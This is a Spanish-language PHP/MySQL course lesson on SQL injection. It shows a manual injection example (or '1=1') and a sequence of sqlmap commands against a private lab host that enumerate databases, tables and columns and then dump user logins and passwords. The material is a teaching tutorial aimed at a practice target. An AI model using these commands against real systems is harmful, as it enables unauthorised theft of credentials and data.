php63
Programador Novato > [Curso] PHP y Mysql de 0 a 100 > Curso de PHP🐘 y MySql🐬 [63.- Que es SQL Inyección💉 y como usar sqlmap]

Curso de PHP🐘 y MySql🐬 [63.- Que es SQL Inyección💉 y como usar sqlmap]

En este tutorial vamos a aprender a menejar SQL Inyección💉 en nuestras consultas de mysql y ademas usaremos sqlmap para hacer inyecciones mas avanzadas para poder sacar mas información que de forma manual.

Injeccion de codigo sql de forma manual:
SELECT * FROM productos where existencia='39';
SELECT * FROM productos where existencia='39' or '1=1';

Descubrir la BD

sqlmap -u http://192.168.8.103/cat.php?id=2 --dbs

Descubrir las Tablas

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog --tables

Descubrir las Columnas

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users --columns

Obtener los datos

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users -C id,login,password --dump

🎦Sqlmap en Kali Linux: https://www.youtube.com/watch?v=TRR5TWr-HFI
🎦Instalar kali linux en una usb desde windows 10: https://youtu.be/6POGcKizDts
🎦Blog con vulnerabilidades para hacer pentatesting con kali linux 🐞:https://www.youtube.com/watch?v=EuYJSXqngTY

🎦 Esta lista de reproducción: https://www.youtube.com/playlist?list=PLCTD_CpMeEKS2Dvb-WNrAuDAXObB8GzJ0

Codigos en gdrive: https://drive.google.com/file/d/1tQwYvfL2jiUFc6beTWkOkGmXkq5zzFw2/view?usp=sharing
Gracias por apoyar este canal: https://www.patreon.com/programadornovato?fan_landing=true

🔗 Facebook: https://facebook.com/ProgramadorNovatoOficial
🔗 Twitter: https://twitter.com/programadornova
🔗 Linkedin: https://www.linkedin.com/in/programadornovato/
🔗 Instagram: https://www.instagram.com/programadornovato/

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *